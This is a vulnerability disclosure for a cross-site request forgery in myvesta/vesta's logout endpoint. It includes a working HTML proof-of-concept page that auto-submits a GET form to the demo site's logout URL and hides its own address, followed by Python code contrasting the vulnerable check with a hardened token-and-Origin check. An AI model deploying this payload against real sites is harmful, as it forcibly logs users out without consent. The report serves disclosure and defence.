Cross-Site Request Forgery (CSRF) in myvesta/vesta
Aug 24th 2021
An attacker is able to log a user out if the logged-in user visits the attacker's website.
Proof of Concept
1. While logged in, open this POC.html in a browser.
2. Observe that you have been logged out unintentionally.
<html>
<body>
  <!-- hide the PoC page's own URL from the address bar -->
  <script>history.pushState('', '', '/')</script>
  <!-- GET form aimed at the logout endpoint, which requires no CSRF token -->
  <form action="https://demo.myvesta.com/logout/">
    <input type="submit" value="Submit request" />
  </form>
  <!-- auto-submit the first (only) form; document.forms is a collection, so index it -->
  <script>document.forms[0].submit();</script>
</body>
</html>
This vulnerability allows an attacker to force an admin or user to log out unintentionally.
Tested on Edge, Firefox, Chrome and Safari.
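The root cause is a logout endpoint that acts on any GET request, so a cross-site form can trigger it. The following added example (not vesta's code, which is PHP; the logic is written in Python here so it can be exercised directly) contrasts that pattern with a hardened check that requires a POST carrying a per-session CSRF token and rejects a foreign Origin; the request model, origin and session layout are constructed assumptions.

```python
import hmac
import secrets
from dataclasses import dataclass, field

SITE_ORIGIN = "https://demo.myvesta.com"  # the application's own origin


@dataclass
class Request:
    """Constructed, minimal model of an incoming HTTP request."""
    method: str
    headers: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)


def new_session() -> dict:
    """Create a logged-in session that carries a random CSRF token."""
    return {"user": "admin", "csrf_token": secrets.token_urlsafe(32)}


SESSION = new_session()


def logout_allowed_vulnerable(request: Request, session: dict) -> bool:
    """Pattern described in the report: any request from a logged-in browser
    ends the session, so the auto-submitted GET form in the PoC succeeds."""
    return session.get("user") is not None


def logout_allowed_hardened(request: Request, session: dict) -> bool:
    """Defender's check: a state-changing action must be a POST, must not
    come from a foreign Origin, and must carry the session's CSRF token."""
    if request.method != "POST":
        return False
    origin = request.headers.get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return False
    submitted = request.form.get("csrf_token", "").encode()
    expected = session.get("csrf_token", "").encode()
    # constant-time comparison so token bytes are not leaked through timing
    return bool(expected) and hmac.compare_digest(submitted, expected)


def poc_request() -> Request:
    """The report's PoC: a top-level GET navigation from the attacker's page."""
    return Request("GET", headers={"Referer": "https://attacker.example/poc.html"})


def forged_post_request() -> Request:
    """Same idea upgraded to a POST form: browsers attach the attacker's Origin."""
    return Request("POST", headers={"Origin": "https://attacker.example"})


def legitimate_request(session: dict) -> Request:
    """A real click on the application's own logout button."""
    return Request("POST", headers={"Origin": SITE_ORIGIN},
                   form={"csrf_token": session["csrf_token"]})
```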
Location: index.php#L3
References: csrf